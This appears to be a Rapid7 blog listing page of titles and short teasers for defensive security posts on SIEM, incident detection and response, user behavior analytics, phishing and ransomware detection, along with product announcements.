InsightIDR is now part of the Rapid7 platform. Learn more about our platform vision and how it enables you to have the SIEM solution you've always wanted.

2 min InsightIDR

How to Detect BitTorrent Traffic on your Network

Learn how to detect BitTorrent traffic on your network to capture metadata such as INFO-HASH, IP addresses, and usernames.

2 min Incident Detection

Rapid7 and NISC work together to help customers with detection and response

Rapid7 and NISC will work together to provide Managed Detection and Response (MDR) services to the NISC member base, powered by the Rapid7 Insight platform and Rapid7 Security Operation Centers (SOCs.)

2 min InsightIDR

Want to try InsightIDR in Your Environment? Free Trial Now Available

InsightIDR, our SIEM powered by user behavior analytics, is now available to try in your environment. This post shares how it can help your security team.

4 min InsightIDR

PCI DSS Dashboards in InsightIDR: New Pre-Built Cards

No matter how much you mature your security program [] and reduce the risk of a breach, your life includes the need to report across the company, and periodically, to auditors. We want to make that part as easy as possible. We built InsightIDR [] as a SaaS SIEM [] on top of our proven User Behavior Analytics (UBA) [

3 min Breach Preparedness

The Legal Perspective of a Data Breach

The following is a guest post by Christopher Hart, an attorney at Foley Hoag and a member of Foley Hoag’s cybersecurity incident response team. This is not meant to constitute legal advice; instead, Chris offers helpful guidance for building an incident preparation and breach response framework in your own organization. A data breach is a business crisis that requires both a quick and a careful response. From my perspective as a lawyer, I want to provide the best advice and assistance I possibl

2 min InsightIDR

More Answers, Less Query Language: Bringing Visual Search to InsightIDR

Sitting down with your data lake and asking it questions has never been easy. In the infosec world, there are additional layers of complexity. Users are bouncing between assets, services, and geographical locations, with each monitoring silo producing its own log files and slivers of the complete picture. From a human perspective, distilling this data requires two unique skillsets: * Incident Response []: Is this anomalous activity a fa

3 min Incident Response

Running an Effective Incident Response Tabletop Exercise

Are you ready for an incident? Are you confident that your team knows the procedures, and that the procedures are actually useful? An incident response [] tabletop exercise is an excellent way to answer these questions. Below, I've outlined some steps to help ensure success for your scenario-based threat simulations. First, identify your audience. This will help inform which type of exercise you'll want to run. Will it be an executive exerci

3 min Authentication

Under the Hoodie: Actionable Research from Penetration Testing Engagements

Today, we're excited to release Rapid7's latest research paper, Under the Hoodie: Actionable Research from Penetration Testing Engagements [], by Bob Rudis [], Andrew Whitaker [], Tod Beardsley [], with loads of input and help from the entire Rapid7 pentesting team. This paper covers the often occult art of penetration testing, and seeks to demystify the proce

8 min SIEM

Incident Detection and Investigation - How Math Helps But Is Not Enough

I love math. I am even going to own up to having been a "mathlete" and looking forward to the annual UVM Math Contest [] in high school. I pursued a degree in engineering, so I can now more accurately say that I love applied mathematics, which have a much different goal than pure mathematics. Taking advanced developments in pure mathematics and applying them to various industries in a meaningful manner often takes years or decades. In th

4 min User Experience

12 Days of HaXmas: Designing Information Security Applications Your Way

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas [/tag/haxmas/] with 12 days of blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Are you a busy Information Security professional that prefers bloated web applications, fancy interactions, unnecessary visuals, and overloaded screens that are difficult to

5 min SIEM

12 Days of HaXmas: Rudolph the Machine Learning Reindeer

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas [/tag/haxmas/] with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Sam the snowman taught me everything I know about reindeer [disclaimer: not actually true], so it only seemed logical that we bring him back to explain the journey of machine learni

4 min User Behavior Analytics

SIEM Tools Aren't Dead, They're Just Shedding Some Extra Pounds

Security Information and Event Management (SIEM) is security's Schrödinger's cat. While half of today's organizations have purchased SIEM tools [], it's unknown if the tech is useful to the security team… or if its heart is even beating or deployed. In response to this pain, people, mostly marketers, love to shout that SIEM is dead, and analysts are proposing new frameworks with SIEM 2.0/3.0, Security Analytics [

4 min Incident Detection

Web Shells 101: Detection and Prevention

2016 has been a big year for information security, as we've seen attacks by both cybercriminals and state actors increase in size and public awareness, and the Internet of Things comes into its own as a field of study. But today we'd like to talk about a very old (but no less dangerous) type of attacker tool – web shells – and new techniques Rapid7 is developing for identifying them quickly and accurately. What is a Web Shell? Web shells are web-based applications that provide a threat actor wi

3 min InsightIDR

How to Troubleshoot Slow Network Issues With Network Traffic Analysis

In this blog, we discuss how to troubleshoot slow network issues with Network Traffic Analysis.

4 min Incident Detection

Introspective Intelligence: What Makes Your Network Tick, What Makes It Sick?

In my last blog post [/2016/11/16/introspective-intelligence-understanding-detections], we reviewed the most prevalent detection strategies and how we can best implement them. This post dives into understanding how to catch what our other systems missed, using attacker behavior analytics and anomaly detection to improve detection. Understand Your Adversary – Attack Methodology Detection Contextual intelligence feeds introduce higher fidelity and the details needed to gain insight into patterns

4 min SIEM

Cyber Threat Intelligence: How Do You Incorporate it in Your InfoSec Strategy?

In the age of user behavior analytics [], next-gen attacks, polymorphic malware, and reticulating anomalies, is there a time and place for threat intelligence? Of course there is! But – and it seems there is always a ‘but' with threat intelligence – it needs to be carefully applied and managed so that it truly adds value and not just noise. In short, it needs to actually be intelligence, not just data, in order to be valuable to

3 min Incident Detection

Introspective Intelligence: Understanding Detection Techniques

To provide insight into the methods devised by Rapid7, we'll need to revisit the detection methods implemented across InfoSec products and services and how we apply data differently. Rapid7 gathers volumes of threat intelligence on a daily basis - from new penetration testing tools [], tactics, and procedures in Metasploit [], vulnerability detections in Nexpose [https://www

4 min Detection and Response

5 Tips If You Are Looking to Analyze & Monitor Network Traffic

There are many good reasons to monitor network traffic. Here are 5 areas you should consider when getting started. Learn more.

6 min Incident Detection

User Behavior Analytics and Privacy: It's All About Respect

When I speak with prospects and customers about incident detection and response (IDR) [], I'm almost always discussing the technical pros and cons. Companies look to Rapid7 to combine user behavior analytics (UBA) [] with endpoint detection and log search to spot malicious behavior in their environment. It's an effective approach: an analytics engine that triggers based on known attack m

4 min SIEM

Displace SIEM "Rules" Built for Machines with Custom Alerts Built For Humans

If you've ever been irritated with endpoint detection being a black box and SIEM [] detection putting the entire onus on you, don't think you had unreasonable expectations; we have all wondered why solutions were only built at such extremes. As software has evolved and our base expectations with it, a lot more people have started to wonder why it requires so many hours of training just to make solutions do what they are designed to do. Defining a

3 min Vulnerability Management

Warning: This blog post contains multiple hoorays! #sorrynotsorry

Hooray for crystalware! I hit a marketer's milestone on Thursday – my first official award ceremony, courtesy of the folks at Computing Security Awards [], which was held at The Cumberland Hotel in London. Staying out late on a school night when there's a 16 month old teething toddler in the house definitely took it's toll the following morning, but the tiredness was definitely softened by the sweet knowledge that we'd left the award ceremony brandishing som

4 min SIEM

Demanding More from Your SIEM Tools [Webcast Summary]

Do you suffer from too many vague and un-prioritized incident alerts? What about ballooning SIEM [] data and deployment costs as your organization expands and ingests more data? You're not alone. Last week, over a hundred infosec folks joined us live for Demanding More out of Your SIEM []. Content Shared in the Webcast In Gartner's Feb 2016, “Security Information and Even

2 min Incident Response

Looking for a Managed Detection & Response Provider? You'll Need These 38 Evaluation Questions

Managed Detection and Response (MDR) services [] are still a relatively new concept in the security industry. Just recently, Gartner published their first Market Guide on Managed Detection & Response [] , which further defines the MDR Services market. MDR Services combines human expertise with tools to provide 24/7 monitoring and

2 min Nexpose

UNITED 2016: Want to share your experience?

Key trends. Expert advice. The latest techniques and technology. UNITED 2016 [] is created from the ground up to provide the insight you need to drive your security program forward, faster. This year, we're also hoping you can provide us with the insight we need to make our products and services even better. That's why we're running two UX focus groups on November 1, 2016. We'd love to see you there—after all, your feedback is what keeps our solutions ever-evolvi

4 min Malware

Malware and Advanced Threat Protection: A User-Host-Process Model

[Editor's Note: This is a sneak peek at what Tim will be presenting at UNITED 2016 in November. Learn more and secure your pass at []!] In today's big data and data science age, you need to think outside the box when it comes to malware and advanced threat protection. For the Analytic Response team [] at our 24/7 SOC in Alexandria, VA, we use three levels of user behavior analytics [https://www.rapid

4 min Nexpose

InsightIDR & Nexpose Integrate for Total User & Asset Security Visibility

Rapid7's Incident Detection and Response [] and Vulnerability Management [] solutions, InsightIDR [] and Nexpose [], now integrate to provide visibility and security detection across assets and the users behind them. Combining the pair provides massive time savings and simplifies incident investigation

3 min InsightIDR

3 Ways for Generating Reports on WAN Bandwidth Utilization

3 popular ways of getting visibility into WAN bandwidth monitoring, one of the most popular use cases for network traffic analysis.

5 min SIEM

SIEM Solutions Don't Detect Attacks, Custom Code And Advanced Analysts Do

This post is the fifth in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. To read the first four, click here [/2015/10/21/search-will-always-be-a-part-of-incident-investigations], here [/2015/10/29/whether-or-not-siem-died-the-problems-remain], here [/2015/11/05/investigating-an-incident-doesnt-end-at-the-perimeter], and here [/2015/11/11/making-sure-search-is-not-your-incident-response-bottleneck]. While a lot of people may think it's a co

4 min Incident Response

The Calm Heroes Fighting Cyber-Crime

The call everyone had been waiting for came in: the shuffleboard table arrived, and was ready to be brought upstairs and constructed! The team had been hard at work all morning in the open-style office space with conference rooms and private offices along the perimeter. The Security Operations Center (SOC) with computers, many monitors and an open layout was behind a PIN activated door. The team wanted something fun in the office to do when they took a break from defending networks. My office-m

2 min Incident Response

10 Years Later: What Have We Learned About Incident Response?

When we take a look at the last ten years, what's changed in attacker methodology, and how has it changed our response? Some old-school methods continue to find success - attackers continue to opportunistically exploit old vulnerabilities and use weak/stolen credentials to move around the network. However, the work of the good guys, reliably detecting and responding to threats, has shifted to accommodate an attack surface that now includes mobile devices, cloud services, and a global workforce t

3 min User Behavior Analytics

[Q&A] User Behavior Analytics as Easy as ABC Webcast

Earlier this week, we had a great webcast all about User Behavior Analytics [] (UBA). If you'd like to learn why organizations are benefiting from UBA, including how it works, top use cases, and pitfalls to avoid, along with a demo of Rapid7 InsightIDR, check out on-demand: User Behavior Analytics: As Easy as ABC [] or the UBA Buyer's Tool Kit [

0 min Incident Response

From the trenches: Breaches, Stories, Simple Security Solutions - from MacAdmins at PSU

Over the last few months, Jordan Rogers [/author/jordan-rogers] and I have been speaking about the benefits of doing the basics right in information security. Reducing noise, avoiding the waste of precious budget dollars on solutions that will not be used to their fullest, as well as improving the overall security of your enterprise are all goals that can be achieved with some of these simple tips. We presented a hybrid Mac/Windows version of this talk at the MacAdmins conference at PSU [http:

3 min SIEM

Hide and Seek: Three Unseen Costs in Your SIEM Products

As the saying goes, ‘there is no such thing as a free lunch.' In life, including the technology sector, many things are more expensive than they appear. A free game app encourages in-app purchases to enhance the playing experience, while a new phone requires a monthly plan for data, calling, and texting capabilities. In the security industry, one technology that stands out for its hidden costs is Security Information and Event Management (SIEM) tools [].

0 min Security Nation

[Security Nation] Moving Beyond SIEM — Or Not?

The amount of alerts streaming out of security tools can easily lead infosec professionals down the wrong path. But what’s the solution?

0 min Security Nation

[Security Nation] Building, Accelerating, and Measuring an Incident Response Program

In this episode of Security Nation, Wade Woolwine and Kyle Flaherty discuss how organizations can manage incident detection and response initiatives.

3 min SIEM

Detecting Stolen Credentials Requires Endpoint Monitoring

If you are serious about detecting advanced attackers using compromised credentials [] on your network, there is one fact that you must come to terms with: you need to somehow collect data from your endpoints. There is no way around this fact. It is not only because the most likely way that these attackers will initially access your network is via an endpoint. Yes, that is true, but there are also behaviors, both simple and stealthy, th

3 min Incident Response

Applying Poker Theory to Incident Detection & Response

Editors Note: Calling Your Bluff: Behavior Analytics in Poker and Incident Detection [/2016/03/31/calling-your-bluff-behavior-analytics-in-poker-and-incident-detection] was really fun and well received, so here's an encore! Hold'em & Network Security: Two Games of Incomplete Information When chatting about my past poker experience, there's one statement that pops up time and time again: “So… as a 'pro'… you probably bluff a lot.” A bluff is a bet made knowing that if called, you have no c

5 min InsightIDR

5 Methods For Detecting Ransomware Activity

Recently, ransomware was primarily a consumer problem. However, cybercriminals behind recent ransomware attacks have now shifted their focus to businesses.

4 min Incident Response

Attackers Prey on Incident Response Bottlenecks

Organizations are taking too long to detect attacks. The average length of time to detect an intruder ranges from 2 months to 229 days across many reports and anecdotal evidence from publicized breaches supports these numbers. This means that attackers are taking advantage of the challenges inherent to the flood of information bombarding your incident response team every day. This is a problem that we need to address by improving the process with better tools. The incident handling process is s

5 min SIEM

Why Flexible Analytics Solutions Can Help Your Incident Response Team

I happen to despise buzzwords, so it has been challenging for me to use the term "big data security analytics" in a sentence, mostly because I find it to be a technical description of the solutions in this space, rather than an indicator of the value they provide. However, since we build products based on the security problems we identify, I want to explain how those technologies can be used to target some highly pervasive incident response challenges. Detection and investigation problems conti

5 min Incident Response

What Makes SIEMs So Challenging?

I've been at the technical helm for dozens of demonstrations and evaluations of our incident detection and investigation solution, InsightIDR [], and I've been running into the same conversation time and time again: SIEMs aren't working for incident detection and response.  At least, they aren't working without investing a lot of time, effort, and resources to configure, tune, and maintain a SIEM deployment.  Most organizations don't have the recommende

3 min Cloud Infrastructure

Incident Detection Needs to Account for Disruptive Technologies

Since InsightIDR [] was first designed, there has been a noteworthy consistency: it collects data from your legacy networking infrastructure, the mobile devices accessing your resources, and your cloud infrastructure. This is because we believe that you need to monitor users wherever they have access to the network to accurately detect misuse and abuse of company resources, be they malicious or negligent in origin. This doesn't mean tiptoeing around emp

4 min Honeypots

Leverage Attackers' Need To Explore For Detection

When you examine the sanitized forensic analyses, threat briefings, and aggregated annual reports, there are a two basic facts that emerge: 1. There are a lot of different attacker groups with access to the same Internet as baby boomers and short-term contractors. 2. Most of them are proficient at user impersonation once on the network to remain undetected for months. In this reality, our organizations need to do more than just build defenses and sit in waiting until known signature

3 min SIEM

Attackers Thrive on Chaos; Don't Be Blind to It

Many find it strange, but I really enjoy chaos. It is calming to see so many problems around in need of solutions. For completely different reasons, attackers love the chaos within our organizations. It leaves a lot of openings for gaining access and remaining undetected within the noise. Rapid7 has always focused on reducing the weaknesses introduced by chaos. Dr. Ian Malcolm taught us in Jurassic Park that you cannot control chaos. Instead, we strive to help you reduce and understand its impa

4 min SIEM

Enterprise Account Takeover: The Moment Intruders Become Insiders

Every time an attacker successfully breaches an organization, there is a flurry of articles and tweets attempting to explain exactly what happened so information security teams worldwide are able to either a) sleep at night because they have mitigated the vector or b) lose only one night of sleep mitigating it. Here's the problem: every breach is complex and involves a great deal more malicious actions than are published on your chosen 24-hour news website. The least detected action is the use o

5 min Cloud Infrastructure

Positive Secondary Effects: Incident Response Teams Benefit From Cloud Applications

We primarily hear the term "secondary effects" after natural disasters: "an earthquake causes a gas line to rupture and a fire ensues" or "a volcano erupts and the sulfur cloud shuts down all flights across the Atlantic", but there are a lot of positive secondary effects out there. If developed properly, cloud applications bring with them secondary effects of singular events to benefit the customer community. Since I work for a security company, I cannot write a blog post about cloud applicatio

4 min SIEM

When Your SIEM Tools Are Just Not Enough

Security Information and Event Management (SIEM) tools have come a long way since their inception in 1997. The initial vision for SIEM tools [] was to be a ‘security single pane of glass,' eliminating alert fatigue, both in quantity and quality of alerts. Yet the question still remains: have SIEMs delivered on that promise, and if so, can every security team benefit from one? In this blog we'll dive a bit into the history be

3 min SIEM

Alert Fatigue: Incident Response Teams Stop Listening to Monitoring Solutions

"Don't Be Noisy." It's that simple. This motto may be the only remaining principle of the concept that entered incubation in mid-2012 and eventually became InsightIDR. [] Of the pains that our customers shared with us up to that point, there was a very consistent challenge: monitoring products were too noisy. Whether they were talking about a firewall, a web proxy, SIEM, or a solution that doesn't fit into a simple category, these design partners told

2 min InsightIDR

The Insight Platform Goes to Europe: Now Compliant with European Data Hosting Requirement

Cloud technology is everywhere. From our annual survey, we found that 79% of organizations are allowing approved cloud services, with Office 365, Google Apps, and Salesforce coming in as top 3. Our full incident detection & investigation solution, InsightIDR, our incident detection and response solution [], and InsightUBA, our user behavior analytics solution [] are both cloud-based by design, and hosts in the

1 min Incident Detection

Redner's Markets Selects Nexpose & InsightUBA for Compliance and Incident Detection

With breaches making regular headlines, security teams are under more scrutiny than ever before. This is especially true in retail, where strong security practices are paramount to protecting customer and organizational data. PCI DSS compliance is a key component of any retail organization's security program. As a level 2 merchant, Redner's Markets [] must conduct regular vulnerability scans, collect logs, and review them daily. “Compliance was what began our rel

4 min Incident Detection

Attackers Love When You Stop Watching Your Endpoints, Even For A Minute

One of the plagues of the incident detection space is the bias of functional fixedness. The accepted thought is that your monitoring is only effective for systems that are within the perimeter and communicating directly with the domain controller. And, the logic continues, when they are away from this trusted realm, your assets are protected only by the preventive software running on them. Given the continuous rise of remote workers (telecommuting rose 79 percent from 2005 to 2012), it's now tim

2 min Incident Detection

UNITED 2016: Power Up Your Incident Detection and Response

When you think about fall in New England, the visions that should flow through your head are gorgeous foliage, cool autumn nights... and the evolution of incident detection and response technology. That's right, it's time we start talking about UNITED 2016 [], Rapid7's annual user conference held in Boston (this year it's November 1-3). This UNITED, we have a major initiative to help you cut through the industry noise, acronyms, and buzzwords around IDR. That is why this

4 min Incident Detection

IDC: 70% of Successful Breaches Originate on the Endpoint

This is part 2 of a blog post series on a new IDC infographic covering new data on compromised credentials and incident detection [] . Check out part 1 now [/2014/11/10/more-efficient-incident-detection-and-investigation-saves-400000-per-year-says-idc] if you missed it. Most organizations focus on their server infrastructure when thinking about security – a fact we often see in our Ne

2 min Incident Response

SANS Review of Rapid7 UserInsight (now InsightUBA) for User Behavior Analytics and Incident Response

Editor's Note - March 2016: Since this review, UserInsight has now become InsightUBA. Along with the name change comes a completely redesigned user interface, continuous endpoint detection, and another intruder trap to reliably detect attacker behavior outside of logs. We also launched InsightIDR, which combines the full power of InsightUBA with Endpoint Forensics, Machine Data Search, and Compliance Reporting into a single solution. Learn more about InsightIDR here. [

2 min InsightIDR

Calling Your Bluff: Behavior Analytics in Poker and Incident Detection

As a former – or dormant – professional poker player, I'm seeing a lot of parallels between poker and incident detection, especially when it comes to behavior analytics. Detecting a bluff in poker is really not all that different from detecting an intruder on the network. New solutions, like Rapid7's InsightIDR [], incorporate machine learning and user behavior analytics [] to detect stealthy attacks. This is

5 min Incident Detection

What is Incident Detection and Response?

Incident detection and response [], also known as attack/threat detection and response, is the process of finding intruders in your infrastructure, retracing their activity, containing the threat, and removing their foothold. By learning how attackers compromise systems and move around your network, you can be better equipped to detect and stop attacks before valuable data is stolen. This blog covers the different components of the attack lifecycle to h

2 min InsightIDR

Moving Beyond UserInsight: What's New in InsightUBA?

As Kyle mentioned at launch, there's a lot more to InsightUBA than a name change. Over the past nine months, we've continued to work with our Penetration Test and Analytic Response teams, and sought direct input from you all to not only better our detection and investigation, but also improve your user experience. Improve how? It's all centered on saving you time: less time scoping and validating alerts, less jumping between screens, and a single optimized workflow for even faster investigations

5 min Events

RSA 2016: Filtering Through The Noise

The memory is a fickle beast. Perhaps this past RSA Conference was my 14th, or my 8th, or 7th…hmmm, they often run together. In truth this Conference has become such an ingrained part of my life that my wife often jokes about becoming a “RSA Widow” the week of the conference, and then dealing with my “RSAFLU” the next week. Well this year was different team, this year SHE got sick upon my return, along with two of the kids. Oh karma, that was just deserved. And while the fridge is now full of Ta

3 min Breach Response News

Changing Threat Landscape Evolves IDR

This is part 2 of a 2-part blog series on how Incident Response is changing. Here's part one [/2016/03/03/incident-response-the-times-they-are-a-changin]. The changing threat landscape forced an evolution in incident detection & response (IDR) that encompasses changes in tools, process, and people. While in 2005 we could get away with basic detection and a “pave and re-image” approach, 2016 sees us needing complex detection methodologies enabled by powerful software and hardware to enable expe

1 min Incident Detection

Incident Response: The Times They Are A Changin'

While everyone in the security world is seemingly at RSA Conference, my mind has been searching through the past. It actually started a few weeks ago, when Gartner's Anton Chuvakin asked for examples of how today's Incident Detection & Response (IDR) is different from 2005 [] . My short comment to his post started to explore the topic of change over the past decade of IR, but I kept thinki

2 min Incident Detection

There's More To A Name: Introducing InsightUBA

…intuition, perception, awareness, understanding, comprehension, wisdom… Each morning driving my two older boys to school we play the ‘synonym game', and I pit them against one another in a three-round battle to see how many alternatives they can come up with to the words I've selected that morning. The games get brutal; this is of no surprise to those who have seen my 1,000 page ‘ Synonym Finder []' book prominently displayed in

8 min Threat Intel

How to Build Threat Intelligence into your IDR Strategy: Webinar FAQ

Thanks to everyone who joined our webinar on How to Build Threat Intelligence into your Incident Detection and Response Program [] . We got so many great questions during the session that we decided to follow up with a post answering them and addressing the trends and themes we continue to see around threat intelligence. TL/DR for those of you who don't have time to read all of

1 min Incident Detection

Get the 2015 Incident Detection & Response Survey Results!

In order to learn more about the strategic initiatives, current tools used, and challenges security teams are facing today, we surveyed 271 security professionals hailing from organizations across the globe. We were able to get fantastic responses representing companies from all sizes and industries, including healthcare, finance, retail, and government. On January 21st, we will be hosting a webcast with full analysis of the results. Register now and get the full report today. [http://www.ra

5 min Log Management

If You Work In Operations, Your Security Team Needs The Logs, Too

This post is the final in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. To read the previous six, click one [/2015/10/21/search-will-always-be-a-part-of-incident-investigations], two [/2015/10/29/whether-or-not-siem-died-the-problems-remain], three [/2015/11/05/investigating-an-incident-doesnt-end-at-the-perimeter], four [/2015/11/11/making-sure-search-is-not-your-incident-response-bottleneck], five [/2015/11/19/siems-dont-detect-attacks-a

5 min SIEM

5 Ways Attackers Can Evade a SIEM

I've been in love with the idea of a SIEM since I was a system administrator. My first Real Job™ was helping run a Linux-based network for a public university. We were open source nuts, and this network was our playground. Things did not always work as intended. Servers crashed, performance was occasionally iffy on the fileserver and the network, and we were often responding to outages. Of course, we had tools to alert us when outages were going on. I learned to browse the logs and the system m

4 min Incident Response

Even With 80% Automation For Detection, You Need to Ease the 20% Human Diligence

This post is the penultimate in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. To read the first five, click here [/2015/10/21/search-will-always-be-a-part-of-incident-investigations], here [/2015/10/29/whether-or-not-siem-died-the-problems-remain], here [/2015/11/05/investigating-an-incident-doesnt-end-at-the-perimeter], here [/2015/11/11/making-sure-search-is-not-your-incident-response-bottleneck], and here [/2015/11/19/siems-dont-detect-a

4 min Incident Detection

When Hunting is the Right Choice for Your Security Team - and when it's not

The concept of hunting for threats is being hyped by media and vendors – creating a marketing smokescreen of confusion around what hunting is, how it works, and what value looks like when hunting is done effectively. Your security team's ability to hunt is primarily affected by the maturity of your security program, your threat profile, and your resources. Hunting is searching for malice on your network The security lifecycle can be described in a number of ways, I think a good way of describi

1 min Incident Detection

Take the Rapid7 2015 Incident Detection & Response Survey!

Take the 10 Minute Survey here. [] Incident Detection and Response is a growing challenge - security teams are often understaffed, the attack surface for intruders is expanding, and it's difficult to detect stealthy user-based attacks. We want to learn more about your organization's security team, including the challenges you're facing today and plans for the future. Your feedback helps shape the products Rapid7 offers to make your job easier. By t

5 min Incident Response

Making Sure Search Is Not Your Incident Response Bottleneck

This post is the fourth in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. To read the first three, click here [/2015/10/21/search-will-always-be-a-part-of-incident-investigations], here [/2015/10/29/whether-or-not-siem-died-the-problems-remain], and here [/2015/11/05/investigating-an-incident-doesnt-end-at-the-perimeter]. Nearly a year ago, I likened the incident handling process to continuous flow manufacturing [/2014/12/12/attackers-prey

4 min Incident Response

Investigating An Incident Doesn't End At The Perimeter

This post is the third in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. To read the first two, click here [/2015/10/21/search-will-always-be-a-part-of-incident-investigations] and here [/2015/10/29/whether-or-not-siem-died-the-problems-remain]. In the second blog of this series [/2015/10/29/whether-or-not-siem-died-the-problems-remain], I touched on the need for solutions more flexible than the traditional SIEM architecture focused prima

5 min SIEM

Whether or Not SIEM Died, the Problems Remain

This post is the second in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. To read the previous, click here [/2015/10/21/search-will-always-be-a-part-of-incident-investigations]. Various security vendors have made very public declarations claiming everything from “SIEM is dead.” to asking if it has merely “lost its magic”. Whatever your stance on SIEM, what's important to recognize is that while technologies may fail to solve a problem, thi

3 min Nexpose

UserInsight Integrates with Nexpose for Total User and Asset Security Visibility

Rapid7's Vulnerability Management and User Behavior Analytics solutions [] , Nexpose and UserInsight, now integrate to provide visibility and security detection across assets and the users behind them. Combining the pair provides massive time savings and simplifies incident investigations by highlighting risk across your network ecosystem without writing queries or digging through logs. Related Resou

4 min Incident Response

Search Will Always Be A Part of Incident Investigations

This post is the first in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. Strong data analytics have recently enabled security teams to simplify and speed incident detection and investigation, but at some point of every incident investigation, a search through machine data is nearly always necessary to answer a one-time question before the investigation can be closed. Whether your incident response team is just trying to combat the flood of

4 min Microsoft

From Windows to Office 365: Detecting Intruder Behavior in Microsoft Infrastructures

Microsoft infrastructures have traditionally been on-premise. This is about to change as Microsoft is getting incredible traction with Office 365 deployments. As the corporate infrastructure is changing, many security professionals are concerned about security and transparency of their new strategic cloud services and need to change their incident detection and response programs. This blog post is a quick introduction to this topic. If you're interested in more info, check out our webcast Increa

5 min Phishing

Get Off the Hook: 10 Phishing Countermeasures to Protect Your Organization

The Internet is full of articles for how to tell if an email is phishing but there seems to be a lack of concise checklists how to prepare an organization against phishing attacks, so here you go. Because phishing attacks humans and systems alike, the defense should also cover both aspects. None of the following steps is bullet proof, so layering your defenses is important – and having an incident response plan [] in case someone does get thr

3 min InsightIDR

Top 5 Alternatives For SPAN or Mirror Ports

Don’t want to use SPAN ports, but still need a source of network packets? In this blog post we break down the top 5 alternatives for you to consider.

1 min User Behavior Analytics

[5 Min Demo] Investigate Security Incidents Faster with User Context

Investigating incidents is a tough challenge. It's like solving a 100 piece jigsaw puzzle with a million unarranged pieces on the table. We must first identify what's relevant, and only then start to piece the disparate information together into a coherent picture. This requires a combination of technical expertise and the fortitude to parse often tedious logs, putting strain on the security team. Want to see how we've helped customers speed up incident investigation... by an order of magnitude

2 min Malware

Hammertoss Demonstrates Need for Applying Attacker Knowledge to Behavior Analytics

A recent report on a new type of malware dubbed “Hammertoss []” highlights the importance of applying knowledge of attacker methodologies to behavior analytics. As an industry, we get very fixated on the latest intruder tools. The risk here is that we can't see the forest for the trees. To effectively detect intruders, we must look at the entire attack chain and the methods attackers will always use to complete their mi

3 min Incident Detection

All Alerts Are Not Created Equal

In my experience, automated alerts are one of the most challenging, duplicitous factors in security.  On the one hand, there is simply too much data for us humans to sift through, so having a system in place to analyze and correlate data automagically is hugely helpful.  On the other hand, once the tool has analyzed data and spat out alerts, the security team (or security person) still bears the responsibility of interpreting and reacting to this data, which is fine…so long as the number of aler

9 min Log Management

Q & A from the Incident Response & Investigation Webcast: "Storming the Breach, Part 1: Initial Infection Vector"

The recent webcast “Storming the Breach, Part 1: Initial Infection Vector [] ”, with Incident Response experts Wade Woolwine [/author/wade-woolwine] and Mike Scutt sparked so many great questions from our live attendees that we didn't have time to get through all of them! Our presenters took the time to answer additional questions after the fact... so read on for the overflow Q&A on tips and tricks for

2 min Phishing

Top 3 Takeaways from the "Storming the Breach, Part 1: Initial Infection Vector" Webcast

In the recent Rapid7 webcast, “Storming the Breach, Part 1: Initial Infection Vector [] ”, Incident Response experts Wade Woolwine [/author/wade-woolwine] and Mike Scutt had a technical discussion on investigation methodologies for the 3 most common breach scenarios: spear phishing, browser exploitation, and web server compromise. Their discussion was packed with details and expert tips for investigati

1 min Phishing

Join us at Camp Rapid7: Free Security Learnings All Summer Long

This summer, Rapid7 is hosting a ton of free, educational security content at the Rapid7 Security Summer Camp []. Camp Rapid7 is a place where security professionals of all ages (Girls AND Boys Allowed!) can gain knowledge and skill in incident detection and response, cloud security, phishing, threat exposure management, and more. A few of the exciting activities for visitors at Camp Rapid7 [https://information.rapid7

6 min Transportation

Low and Slow: Attackers Easily Hide From Time-Blind Alerts

Many organizations focus their detection strategy almost exclusively on malware, not realizing that attackers don't need it to compromise their networks. When you start to look at the extensive intruder behavior outside of malware, you quickly recognize the massive detection challenges we face today. Not only do these intruders change their techniques when they become easy to detect, but all too much of the detection available depends on events occurring at a single point in time. This inability

1 min Incident Response

How to mitigate the threat of an extortion attempt against your organization

We've had a few conversations with our customers recently who have alerted us to extortion attempts against their organizations. Thankfully, none were successful. This post is to detail the events that have transpired so that you can alert your organizations and increase your odds of not falling victim to this scam: * Attackers will register a domain name similar to yours. For example, the attacker might register when is the legitimate domain * Attackers will target t

6 min Incident Detection

Let's talk about metrics...

Today I read an article on metrics and it was interesting. Here's the link to the original article. [] I am kind of a metrics geek. When done well, a metrics program can be of extreme value to a security program. However, when done badly, they can cloud your vision and make it difficult to notice that your radar is off by a few degrees. The article addressed severa

2 min Phishing

Top 3 Takeaways from the "Getting One Step Ahead of the Attacker: How to Turn the Tables" Webcast

For too long, attackers have been one step (or leaps) ahead of security teams. They study existing security solutions in the market and identify gaps they can use to their advantage. They use attack methods that are low cost and high return like stolen credentials and phishing, which works more often than not. They bank on security teams being too overwhelmed by security alerts to be able to sift through the noise to detect their presence. In this week's webcast, Matt Hathaway [/author/matt-hat

3 min Incident Response

Detecting Intruders Early Can Ruin Their Business Model

If you look at attackers as faceless, sophisticated digital ninjas, it instills fear, but doesn't really help to stop them. While there are many motivations for attacking an organization and stealing its data, the most frequent are based on money. This is why it sometimes helps to view them as you would any other business: as having costs and needing to generate revenue to survive. Attacker groups are similar to high-tech startups There is a thriving economy full of people who breach organizati

2 min InsightIDR

Tracking Web Activity by MAC Address

In this blog post we explore the benefit of tracking web activity by MAC address. Learn more.

2 min Incident Response

Top 3 Takeaways from the "Security Pro's Guide to Breach Preparedness and Response" Webcast

In this week's webcast Wade Woolwine [/author/wade-woolwine] and Mike Scutt talked about how to prepare for an incident and be ready to respond effectively when one occurs. Breaches are happening all the time. They vary in size and scope, but will end up affecting every organization in one way or another. Incident preparedness leads to more efficient and streamlined incident response. Read on to learn the top takeaways from Wade and Mike's “Security Pro's Guide to Breach Preparedness and Respons

1 min Incident Detection

#DFIRchat - Join our Incident Response Tweetchat Monday March 9, 3:30pm ET

